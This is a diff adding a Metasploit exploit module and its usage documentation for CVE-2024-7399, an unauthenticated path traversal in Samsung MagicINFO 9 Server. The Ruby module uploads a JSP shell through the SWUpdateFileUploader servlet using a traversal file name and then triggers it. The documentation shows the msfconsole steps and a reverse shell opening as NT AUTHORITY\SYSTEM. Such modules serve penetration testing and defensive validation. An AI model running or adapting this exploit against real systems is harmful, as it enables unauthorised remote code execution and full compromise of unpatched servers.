CVE-2024-7399

Author: h4x-x0r

documentation/modules/exploit/windows/http/magicinfo_traversal.md

@@ -0,0 +1,67 @@
+## Vulnerable Application
+
+**Vulnerability Description**
+
+This module exploits a path traversal vulnerability in Samsung MagicINFO 9 <= 21.1050.0 (CVE-2024-7399).
+
+Remote code execution can be obtained by exploiting the path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet,
+which can be queried by an unauthenticated user to upload a JSP shell.
+By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT
+AUTHORITY\SYSTEM.
+
+**Vulnerable Application Installation**
+
+A trial version of the software can be obtained from [the vendor]
+(https://www.samsung.com/us/business/solutions/digital-signage-solutions/magicinfo/).
+
+**Successfully tested on**
+
+- MagicINFO 9 21.1040.2 on Windows 10 (22H2)
+
+## Verification Steps
+
+1. Install Postgres or MySQL
+2. Install the application
+3. Activate the license
+4. Start `msfconsole` and run the following commands:
+
+```
+msf6 > use exploit/windows/http/magicinfo_traversal 
+msf6 exploit(windows/http/magicinfo_traversal) > set RHOSTS <IP>
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+```
+
+You should get a shell in the context of `NY AUTHORITY\SYSTEM`.
+
+## Scenarios
+
+Running the exploit against MagicINFO 9 21.1040.2 on Windows 10 should result in an output similar to the
+following:
+
+```
+msf6 exploit(windows/http/magicinfo_traversal) > exploit 
+
+[*] Started reverse TCP handler on 192.168.137.204:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] MagicINFO version detected: MagicINFO 9 Server 21.1040.2
+[+] The target appears to be vulnerable.
+[*] Uploading payload...
+[*] Upload successful
+[*] Payload executed!
+[*] Command shell session 3 opened (192.168.137.204:4444 -> 192.168.137.230:50038) at 2025-05-14 17:36:47 -0400
+
+
+Shell Banner:
+Microsoft Windows [Version 10.0.19045.3208]
+(c) Microsoft Corporation. All rights reserved.
+
+C:\MagicInfo Premium\tomcat\bin>
+-----
+          
+
+C:\MagicInfo Premium\tomcat\bin>whoami
+whoami
+nt authority\system
+
+C:\MagicInfo Premium\tomcat\bin>
+```

modules/exploits/windows/http/magicinfo_traversal.rb

@@ -0,0 +1,116 @@
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Samsung MagicINFO 9 Server Remote Code Execution (CVE-2024-7399)',
+        'Description' => %q{
+          Remote Code Execution in Samsung MagicINFO 9 Server.
+          Remote code execution can be obtained by exploiting a path traversal vulnerability (CVE-2024-7399) in the SWUpdateFileUploader servlet, which can be queried by an unauthenticated user.
+          By default, the application listens on TCP ports 7001 (HTTP) and 7002 (HTTPS) on all network interfaces and runs in the context of NT AUTHORITY\SYSTEM.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Michael Heinzl', # MSF Module
+          'SSD Secure Disclosure' # Discovery and PoC
+        ],
+        'References' => [
+          [ 'URL', 'https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/'],
+          [ 'CVE', '2024-7399']
+        ],
+        'DisclosureDate' => '2025-04-30',
+        'Platform' => [ 'windows' ],
+        'Arch' => [ ARCH_CMD ],
+        'Targets' => [
+          [
+            'Java Server Page', {
+              'Platform' => %w[win linux unix],
+              'Arch' => ARCH_JAVA
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(7002),
+        OptString.new('TARGETURI', [ true, 'The URI for the MagicInfo web interface', '/MagicInfo'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'config.js')
+    })
+
+    return CheckCode::Unknown unless res && res.code == 200
+
+    js_object = res.body.to_s[/window\.globalConfig\s*=\s*(\{.*\})/m, 1]
+
+    unless js_object
+      fail_with(Failure::UnexpectedReply, 'Could not extract globalConfig object from response')
+    end
+
+    json_safe = js_object.gsub(/'/, '"')
+    json_safe.gsub!(/,(\s*[}\]])/, '\1')
+    data = JSON.parse(json_safe)
+
+    full_version = data['magicInfoFrontEndVersion']
+    version = full_version[/Server\s+([\d.]+)/, 1]
+
+    if Rex::Version.new(version) <= Rex::Version.new('21.1050.0')
+      vprint_status("MagicINFO version detected: #{full_version}")
+      return CheckCode::Appears
+    else
+      return CheckCode::Safe
+    end
+  end
+
+  def exploit
+    execute_command(payload.encoded)
+  end
+
+  def execute_command(_cmd)
+    print_status('Uploading shell...')
+
+    post_data = _cmd
+
+    res = send_request_cgi({
+      'method' => 'POST',
+      'ctype' => 'text/plain',
+      'data' => post_data,
+      'uri' => normalize_uri(target_uri.path, 'servlet/SWUpdateFileUploader?fileName=./../../../../../../server/shell2.jsp&deviceType=abc&deviceModelName=test&swVer=123')
+
+    })
+
+    if res && res.code == 200
+      print_good('Upload successful.')
+      res1 = send_request_cgi({
+        'uri' => normalize_uri(target_uri.path, 'shell2.jsp'),
+        'method' => 'GET'
+      })
+      if res1 && res1.code == 200
+        print_status('Payload executed!')
+      else
+        fail_with(Failure::PayloadFailed, 'Failed to execute the payload.')
+      end
+    else
+      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload.')
+    end
+  end
+
+end